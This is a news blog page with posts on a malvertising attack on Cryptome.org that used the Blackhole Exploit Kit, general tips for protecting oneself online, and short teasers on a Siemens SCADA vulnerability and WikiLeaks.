An Old Hack Technique Gets A New Twist

Doug Bernard | Washington DC

Hackers may not always be the most innovative group. But as a rule, they are sneaky.

That’s exactly how the latest hack target, Cryptome.org, summed up the recent hit on its website: “sneaky.”

One version of a black hole (Creative Commons: Gallery of Space Time Travel)

A well known anti-secrecy site, Cryptome tends more to be a repository of information that others have obtained using various computer hacks, rather than the victim of a hack itself. But this week thousands of visitors who thought they were visiting the Cryptome website instead found themselves redirected to malicious websites. At the root of the attack is a rapidly growing technique that some are calling “malvertising.”

It works like this. A hacker creates a legitimate-looking ad that has malware hidden deep inside. Now a Trojan horse, that ad is submitted to the large online advertising networks, which then distributes the harmless-looking ad to specific websites. When a visitor clicks on the bad ad, they launch the attack and their computer is compromised.

In and of itself, this is hardly a new technique. However, the Cryptome attack is just the most recent in a growing string of attacks using something called the Blackhole Exploit Kit.  This can get a little geeky, so we’ll try and keep it basic.

Created by Russian hackers, Blackhole is essentially a bag of bad computer code, all designed to target vulnerabilities in a target computer’s operating system. A recent report from M86 Security notes the Blackhole Exploit Kit has become the tool of choice for many hackers, in part because of its “capability to update frequently and rapidly to take advantage of application vulnerabilities.” Driving the point home, a Sophos Corporation analysis of 2012 Internet security trends says these redirect ploys account for 67% of all computer hacks, with Blackhole accounting for a full 31% all by itself.

What was new in the Cryptome hack was security analysts are calling “drive-by” technology. In other words, a visitor to a website with an infected Blackhole ad no longer has to click on the ad; just viewing the page can be enough to inject malware onto your computer. Additionally, as Fahmida Rashid of eWeek.com reports, the Cryptome attack “specifically avoided targeting IP addresses from Google to prevent the search engine from blacklisting the site.” Meaning users were unlikely to know they were under attack until it was too late, and the bad bug was created to avoid being targeted by the world’s largest search engine.

In a word: sneaky.

Cyber security analyst Brian Krebs has a good piece exploring how users of Blackhole malware specifically profit from their misdeeds, while writers at the Imperva Corp’s “Security Blog” have a highly detailed dissection of Blackhole and how it works. Neither are light reading, so we’ll skip to the point: no matter how careful you are on the Internet, it’s becoming harder not to fall into a black hole.

How to Fight Back Against Hackers and Protect Yourself on the Web

Over the last few months we’ve discussed just a few of the many surfacing stories regarding breaches of computer or Internet security.  Whether the threats are from organized crime, shadowy  hacker groups like Anonymous or LulzSec, or coming with the alleged assistance of foreign governments, it seems that  security online is at an all-time low.

That’s probably something of an overstatement.  Arguably it’s more likely the web was significantly less secure even a decade ago, before corporations and governments began taking cyber-security seriously.

Still, threats to our online privacy and security are growing – and growing more sophisticated.  So it’s more important, now than ever, to take what steps we can to protect ourselves.  Below, some (hopefully) helpful suggestions.

#1: Surf “Secure”:  You can be forgiven for not knowing much about the Internet’s new security protocol, even though it’s probably right before your eyes.

Not that long ago that the new “https:” security protocol was officially approved and implemented by browsers like Explorer and Firefox.  You’ve no doubt seen that “http:” string in your web browser many times – it’s probably up there right now.  It stands for “Hyper Text Transfer Protocol”, and it’s basically an instruction to your computer that the data it’s about to see and exchange is in the web’s various “html” languages.

Without getting into the technical details, suffice it to say the new “s” at the end of the string stands for “Secure” and it creates a relatively secure connection between your computer and the Internet.  Using an encryption algorithm, the “https:” tool gives users a mostly private channel to surf the web and share private information.  While many websites do not support the new secure format yet, an expanding number do.  One example is Facebook, which advises all of its users when logging on to make sure they’re using the “https:” secure connection.

In short – use it when you can, and when you can’t, just remember that you might not be alone online.

#2: Just Say No:  That email a friend just sent you with the funny picture “you just have to see”, or the thumb drive someone gave you to transfer a file to your computer?  Be very careful before opening them.

One of the oldest and surest ways to spread a virus or bit of malware over the Internet is as a “document” given to you by a friend.  But don’t blame your friends – blame clever hackers.  For decades they been hiding bad bugs in small executable files masquerading as documents, like text or pictures, sent via email and accompanied by come-on messages like “You’ve got to see this!” or something similar.  Sent from a friend, it’s natural to think they’ve sent you something you’d like to see, but once you open the file, it launches the bug which then often infects your computer, seizes all your email contacts, and sends out copies of itself to all your friends with the same come-on – often without you ever knowing.

As a general rule, if someone sends you something you haven’t asked for, even a friend, think twice about opening it.  If you have any suspicions, drop your friend a note asking what they sent; if they don’t know what you’re talking about, delete the message immediately.  As for flash drives, viruses can just as easily hide there, installing themselves the moment you insert the drive into your computer.  Like before, when you open the drive, don’t open (or double-click) on anything you don’t specifically want.  And as for those hidden bugs you can’t even see…

#3: “Auntie Knows Best”: Auntie, in this case, being anti-virus.

You can only do so much to keep your computer safe and free of malware; many of the more modern viruses are fairly sophisticated and engineered to hide in the deepest corners of your computer.  To fight back, you need something just as technologically sophisticated, and that’s an anti-virus.

Just like their biological counterparts, computer anti-viruses are designed to protect you against a new infection.  But unlike the traditional shot, however, these digital anti-viruses also sweep your computer of older infections.  Better still, they also update themselves regularly, responding to new threats floating around the web.

Some anti-virus programs cost money;  others are free.  Not surprisingly, those that cost are generally much better at updating, sweeping and responding to new threats.  However any legitimate anti-virus program is better than none, as without anything it’s nearly certain your computer will become infected – if it hasn’t already.

The CNET blog provides a great list of free programs to download here; if you’re interested in something a little more robust and can afford a few dollars, shop around online for the best anti-virus package.

#4: No Pass Given: It’s the bane of digital life – the password.  Whether logging in online or dialing up a friend on your mobile, it’s likely your device first wants you to enter a password or code of some sort.  These codes are designed to make sure that you and only you have access to your personal equipment and accounts, so you would think people would take them more seriously.  In truth, many people regard these protections as little more than a bother – and those are the people most likely to get hacked.

Passwords vary greatly in complexity; some only want letters or digits while others demand a mix of upper and lower-case letters, numbers, and non-alphanumeric symbols such as # or &.  The more complex the password, the harder it is for hackers to crack.

Unfortunately, these complex strings are also harder to enter – or even remember.  Thus many people use the simplest codes they can, such as “passord1″ or “12345″ or such.  While easy to enter, passwords like these are so easy to break they can hardly be called passwords – they might as well be called please-break-into-my-computer-words.

Good advice: choose a password that’s complex – use a mix of digits, letters and symbols.  Better advice: don’t use the same password for all your online activities – if someone can hack into one of your accounts, they’ll have access to all of them.  Best advice: change your password often – preferably every 30 days.

This is especially true for mobile devices.  A shockingly large percentage of people never bother to change the factory-set pass codes on their mobile devices, leaving them wide open for a “spoofing” hack so easy even children are doing it.  As we noted in our most recent post, a few mobile phone providers are now requiring individuals to enter their pass codes when checking voice mail, but there’s no requirement to change the pre-set codes.   Before making your first call on a new phone, change your pass code, and then keep changing it, ideally once a month.

#5: Encrypt, Encrypt, Encrypt: While the “https:” protocol provides good, basic protection, these days it may not be enough.  Especially if you’re concerned about keeping your web activities private or want to hide your identity online.

For those, the solution is encryption.  We’ve discussed it here often before, but it’s worth repeating – a solid encryption program such as Tor, Freegate or Psiphon (just to name a few) will help you cover your tracks on the Internet, shield your identity, and keeping for private conversations private.  They also, sometimes, have the added benefit of some of the other precautions above, such as filtering out viruses or mandating secure pass codes, depending on the program.

Of course these are only a few of the many steps you can take to protect yourself online, but they’re a solid start.  If you’re interested in learning more about cyber-security, the U.S. Computer Emergency squad at the Department of Homeland Security has a great FAQ resource that’s worth exploring.

Did Washington Block Discussion of a Security Patch?  Should It Have?

Reports of cyber-attacks and security hacks have been filling the Net lately.  Sony’s “Playstation Network” has suffered a very public series of crippling hacks that may have compromised the personal information of the network’s 100 million users – and cost the electronics giant over 14 billion yen ($170-million dollars.)  South Korean officials announced they were stepping up Internet security barriers in the wake of what it says are accelerating attacks from the North.   And at the other end of the globe, Ireland has been struggling to fend off computer attacks intended to infect otherwise clean local servers with malware.

Now comes news of a potentially debilitating security hole in certain industrial control systems that could possibly lead to massive industrial espionage – or worse.

As first reported in Wired, the flaws affect the “SCADA” systems of various Siemens control devices – many of which can be found in very high-level industrial, processing and generating facilities around the world.  SCADA stands for ‘supervisory control and data acquisition’ -  systems that allow users to both monitor and control a wide variety of processes – and not surprising for a company valued at $80 billion dollars, Siemens products can be found everywhere.  Nuclear plants, natural gas pipelines, waste-water treatment, chemical production – with a big enough security hole, all these and many other facilities are potentially at risk from hackers seeking to take control of the plant. Read the rest of this entry »

How Wikileaks Exploits Technological, and Human, Weaknesses

Kate Woodsome |Washington DC

Founder of the WikiLeaks website, Julian Assange, at a recent press conference in London (Tom Turco - AP)

Historians, anti-war activists and armchair observers of human nature will have plenty to mull over in the coming years, thanks to the online group WikiLeaks.

The website has published hundreds of thousands of previously unreleased U.S. military and diplomatic documents, dating from February of this year to as far back as the 1960s.  The latest round of leaks, involving diplomatic cables, has renewed efforts by the U.S. government to tighten security on its computer systems.  But cyber-security experts point out the leaks were less a breakdown of technology than of trust.

Their thoughts, and the full story, after the jump.